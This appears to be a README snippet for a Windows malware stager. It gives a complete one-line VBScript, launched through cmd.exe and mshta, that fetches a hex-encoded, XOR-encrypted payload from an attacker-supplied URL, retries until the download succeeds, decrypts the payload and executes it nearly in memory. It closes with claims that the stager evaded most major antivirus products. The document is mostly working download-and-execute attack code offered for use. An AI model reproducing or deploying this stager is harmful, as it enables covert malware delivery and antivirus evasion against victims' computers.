Downloads, decode, decrypt and executes a VBScript using cmd and mshta
' Features '
' [*] Autoreconnect '
' [*] Hexadecimal encoded payload (UTF8) '
' [*] Encrypted payload '
' [*] In (**almost) memory execution '
'mshta.exe one line command '
'mshta.exe maximum command length : 487 '
'Script length with double quotes : 330 '
**mshta.exe will save in a temp file your decrypted payload and after the execution the temp file will be deleted
"On Error Resume Next:Set a=CreateObject(""MSXML2.ServerXMLHTTP.6.0""):a.setOption 2,13056:while(Len(b)=0)""GET"",""LINK_TO_YOUR_PAYLOAD"",False:a.send:b=a.responseText:wend:k=""PAYLOAD_DECRYPT_KEY"":for i=0to Len(b)-1Step 2:c=c&Chr(Asc(Chr(""&H""&Mid(b,i+1,2)))xor Asc(Mid(k,((i/2)mod Len(k))+1,1))):Next:ExecuteGlobal c:"
(cmd.exe): mshta vbscript:execute("ONE LINE COMMAND")(window.close)
Tested on Windows7/10 x64 with: Avira, AVG, Avast, ESET32, Kaspersky, Panda, BitDefender and Windows Defender (Win7/10) to launch a more expansive malicous payload, the only one which successfully blocked the process was BitDefender.